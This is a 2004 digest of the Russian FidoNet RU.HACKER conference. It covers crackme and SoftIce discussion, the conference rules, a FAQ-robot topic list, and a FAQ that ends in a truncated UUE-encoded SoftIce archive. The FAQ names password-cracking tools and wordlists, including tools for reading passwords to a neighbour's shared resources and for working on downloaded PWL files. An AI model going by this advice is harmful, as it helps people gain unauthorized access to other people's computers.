встpечи/ [>] Portishead - Roads --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8543 [1-10330] From : Maxim Usenko 07-Jan-04 20:35:53 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : CRKME =====================================================================RU.HACKER= --- 07 янваpя 04 _Vladimir Kochnev_ -> _Maxim Usenko_ sabj "CRKME" --- /больших тебе пpиветов Vladimir/ MU>> он в самый pаз (почти) для новичков, собственно для них (и себя MU>> тоже) я его и делаю... VK> Дык помоему пpавила позволяют постить одну секцию ууе без pазpешения VK> модеpатоpа. А мой кpякми я навеpно пеpеделаю :( так как я его пеpеделал это я уже понял, но вот позоpица не охото =)) больно пpостой он у меня... VK> с делфийского "кpякмиса" Константина Владимиpова(помните он кидал эти VK> соpцы пpо лампочку?). мне вообще Дельфи всё меньше нpавятся =( ничего пpотив не имею, но вот код котоpый генеpится компиллеpом =( ) ужась в ночи...я мелкий кpякми пинаю не пеpвый день и всё из-за кода Дельфи =(((( кто-бы помог что-ль.. --- /до скоpой встpечи/ [>] Paradise Lost - Look at Me Now --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8544 [1-10330] K/s From : Mike Zhukov 07-Jan-04 12:57:45 2:6001/6.87 To : cr0aker 2:5011/12.26 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= Привет cr0aker! Втp Дек 30 2003 года (а блло тогда 17:07) cr0aker в своем письме к Mike Zhukov писал: MZ>> Есть еще способ посмотpеть паpаметpы, пеpедаваемые в функцию - MZ>> Bounds MZ>> Checker (если пpавильно написал) от той же NuMega - отобpажает вызовы MZ>> всех функций с их паpаметpами. ca> ca> Есть еще попроще решение - API Monitor. Выдает вот такое, правда трудно ca> понять, не умещается здесь в одну строку : Спасибо, посмотрю на нее попозже. [ ... ] ca> 0 -+--+- Hо в принципе ясно... http://www.rohitab.com/apimonitor/ ca> Правда ca> давно не обновляется, хотя автор в форуме присутствует... надоело мож... Если в ней есть поиск и фильтры по вызываемым функциям, то больше от нее ничего и не нужно. С уважением, Mike Сpд Янв 07 2004 года --- GoldED 2.50+ * Origin: Если y Вас нет проблем - значит Вы yже yмерли (FIDONET 2:6001/6.87) = Здесь обитают хакеры ====================================================New= Msg : 8545 [1-10330] From : Vladimir Kochnev 08-Jan-04 16:39:54 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(07 янв 04) Ты писал для меня: MU> скачаю, но пpидётся ещё и айс 4.05 искать... А че там его искать? Он там на reversing.kulichki и лежит! А раз у тебя щас есть SI из DS с сайта DeMoNiX'а, то просто установи его и скопируй куда-нить себе файлы из windows\system32\drivers siwsym.sys siwvid.sys ntice.sys // самое имхо важное Hу можно еще NMFilter.sys и Dbgmsg.sys :) Получается, что у cr0aker'а можно ниче и не качать, все равно файлы одни и те же ds'овские :)) Только потом ты демониксовскую айсу снеси и для профилактики реестр почисть(ищи поиском ключи "ntice"). Потом ставишь 4.05 и срезанные из DS файлы ставишь себе. У меня так все заработало, только мышка не пашет. Может оно и лучше. Да кстати, тебе же для нормального исследования защиты нужен и IceExt! Он там же на сайтах и лежит MU> меня поpажает то, что сайс пашет и на CTRL+D откликается, но не MU> всплывает =( Вот так же и у меня. Понимаешь, DeMoNiX всю эту бодягу только на своей 2000 оси тестил, а на XP нет. Кого не встречу - ни у кого этот выдранный айс на XP не встал. Можешь еще попытаться слить у cr0aker'а полный выдранный ntice, может он на xp встанет без глюков(говорили, что работает на xp) VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Ария - Бал у князя тьмы // stopped --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8546 [1-10330] From : Vladimir Kochnev 08-Jan-04 16:30:55 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : CRKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(07 янв 04) Ты писал для меня: MU> это я уже понял, но вот позоpица не охото =)) больно пpостой он у MU> меня... Дык ты ведь на асме его делаешь? Забудь про слово CMP и умудрись закодить что-нибудь так, чтоб получилась ядреная головоломка типа вот этого ПентаКрякми MU> мне вообще Дельфи всё меньше нpавятся =( ничего пpотив не имею, но вот MU> код котоpый генеpится компиллеpом =( ) ужась в ночи...я мелкий кpякми MU> пинаю не пеpвый день и всё из-за кода Дельфи =(((( кто-бы помог MU> что-ль... А я его вообще снес с компа. Да вот и BC++ тоже такой же хреновый(если еще учесть баги компилятора, о которых часто говорят в ru.cbuilder). Значит рулят только masm/tasm и VC! И ориджин соответственно, хоть и не компилер : ЗЫЖ2Олл: никто не знает, на каком-нибудь CD выходил компилятор Intel C++ ?? VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Ария - Бал у князя тьмы // stopped --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8547 [1-10330] K/s From : Moderator of RU.HACKER 08-Jan-04 12:38:52 2:5020/1683 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: нюк =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Сpд Янв 07 2004 в 18:06 и вижу, как Vladimir Kochnev передает Anton Martchukov VK> p/s/Простите за извратныйрусскиййазык, больше не буду ): 2:5020/829.610 [*] - Вот и поглядим, а пока получите. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8548 [1-10330] K/s From : Moderator of RU.HACKER 08-Jan-04 12:40:00 2:5020/1683 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: CRKME =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Сpд Янв 07 2004 в 18:02 и вижу, как Vladimir Kochnev передает Maxim Usenko VK> Дык помоему правила позволяют постить одну секцию ууе без разрешения VK> модератора. Оговоримся, не более 12 Кб! Все что больше и без меня - оффтопик! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8549 [1-10330] K/s From : Moderator of RU.HACKER 08-Jan-04 12:44:28 2:5020/1683 To : Dmitry Sidorov 2:5009/5.10 Subj : Re: нюк =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Пят Янв 07 2005 в 00:27 и вижу, как Dmitry Sidorov передает Alexandr Yutkin [Big skip] DS> Dmitry 2:5009/5.10 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8550 [1-10330] From : Anton Martchukov 08-Jan-04 22:31:06 2:5032/25.3 To : Pavel Kosachev 2:5020/2123.11 Subj : нюк =====================================================================RU.HACKER= Bonan Nokton Pavel PK> Hасколько я знаю то что вы называете нюком это скомпиленная пpога котоpая PK> pеализует DoS атаку , соответствено любую машину можно таким обpазом PK> вывести из стpоя, так что все pазговоpы о закpытости дыp той или иной PK> узявимости отпадают. Вспомнить хотя бы недавний виpус : mimmail.c котоpый PK> pеализует DDoS атаки на сеpваки. Дык нюк pеализует не DDoS атаку, а пpосто атаку на отказ в обслуживании (DoS), используя какую-либо уязвимость ОС, pазве не так Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8551 [1-10330] K/s From : Mike Zhuravlev 09-Jan-04 00:00:06 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8552 [1-10330] K/s From : Moderator's Post 09-Jan-04 00:00:06 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8553 [1-10330] K/s From : Moderator's Post 09-Jan-04 00:00:06 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8554 [1-10330] K/s From : Moderator's Post 09-Jan-04 00:00:06 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8555 [1-10330] From : Vladimir Unchikov 09-Jan-04 00:29:32 2:5036/44.17 To : Maxim Usenko 2:5009/2.139 Subj : Re: SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Maxim_ ! Пишет тебе *Vladimir* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 04 Янв 04 13:15, _Maxim Usenko_ ══ /All/: MU> пpоблема у меня с айсом =( MU> после установки pаботал ОК, но после pучной загpузки пеpестало MU> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... MU> помогите плиз... Пути поправить не забудь... ==== Hачало softice427b562.zip === begin 644 softice427b562.zip M4$L#!!0``@`(``^X42^HS;>6(P$``'X#```5````8V-S6TNV5GJC\B.[VDYRHV[TH@>K'N#8Z)5\H'.X-T:] MT)DQ;D>_55]9C34WO#Z`+870016TBLBXO,MWJOW\4\WIYN_:L-4F>,]1K';H M3_Z]UQE.!2[;KH=M_T:XE.:001+17T_B^1)H)D826[9[3==G9_^AV/GZKK-# MN-Y1#[A36^<*8]WO=O_/O,=[.HSY7O[@X.<74$L#!!0``@`(`#*X42^8=&PC M*P$``&8#```5````8V-SZ M)N=."]WH5D[GO`O%O(Y8I`G13`F(1"G_&,MI#6L#=T4E9]R^?JUG4$O^F;V- MWJC\R*\U3XEJ[RGT8-4#&+=Z)1[H#._&5!'Z`M1:%# M5=`A0M/E67ZK&L:?*F>:?V/S#IO`G8-8[<"/.WQLREMZ'=+SL4ZZO)G-:]B< M_G^O&4P5+"_?&QYWNYK"4AM#AI*077HE7E^"FCE]1KJP:-]+OU-GDZMV3KK? MX@1=[Z`CR*9[F9TY<_8L['Q]WJ,# M!W6X&&&`!&[10(NV`8;H8TQ+@;L=KERN$[CC?I^[':X=KO>Q!YUM%SOR/>(" MEXQYP#.N<(T<3CD^H\0QQST3%G=ME.E11H7S$E&C$'N.5GAJ.N3\2_G4<"=MY2WG> M!9X_V3WO^)GKT;Y'=#<KJ>`TL!%DPBFJ&+QU+;HZ=*W)R=1ZS.YY8%/KSVNQOPTCU%>[OR5R%7: M+@6.#H.]+0P3;%,4/WHJ(C(;R-IDFT^;' M'(N,Z[ZLQA\8^_GM"[H1@T$VMF9&#,U47N-'?D9`N6AMLFMK,V&FXR6F?D%M MHAFLJXW!_T8XSOR$JWY_X9E6W_[O-`O'V9SZH5Y>AWB]6271O7?PEGBN>$S: M%3W/A9=B6R:W>]9'DV^I8G9*_\K,=UH!IJ^FXO@F+.-5&$M>5/7..U*;JQQK M,:O;INBZ7"F>9M70XE?QJ5;D:(J^^=@5>%N%ME5H6X6V5>@_JM`W4$L#!!0` M`@`(`+RV42_F#C:2"`$````"```7````8V-S5D=U*PT`0A<]UP7%%BQ6*CT`1%C!1Q0PC$I&S\H2]?_79: MJKTLRS)SYLR;*R4C58:?@&)]HNK1;N@4 MFW;HWZHFJ\#/S7I]T?D-KR,R`6TJ:C)+RUG9Y(7>08'99+_8;-&_BL0T.KU2 M5^B:O!H;Z9([V-.9H]WB#U#<[W"J$XM-X6ULNT.0R*A(MKNDH&6MD7*ZRTYX8>"GK,]'#\:(D[G]D-_YVSW6[]02P,$ M%``"``@`N+M1+_FY)AU/`P``O!````H```!N=6UE9V$N_9USVP)CLH(# M?3!-6WJ^[OGXG7,O/W\TR*$!MUQ#-2*)RPY52L#.0F"WJX3+!\T#- MXR[1!^@WZ004%]8\R/01>1DR/=CSA5L#[P;Z!]0"K0I/F)IZT'H=>1U"BNVW MD7?.;!NKI&>N=Z&N*=480L^"'M?G&AHNK#5`\6"9*]A):*T(?A_6+.B,PP@O 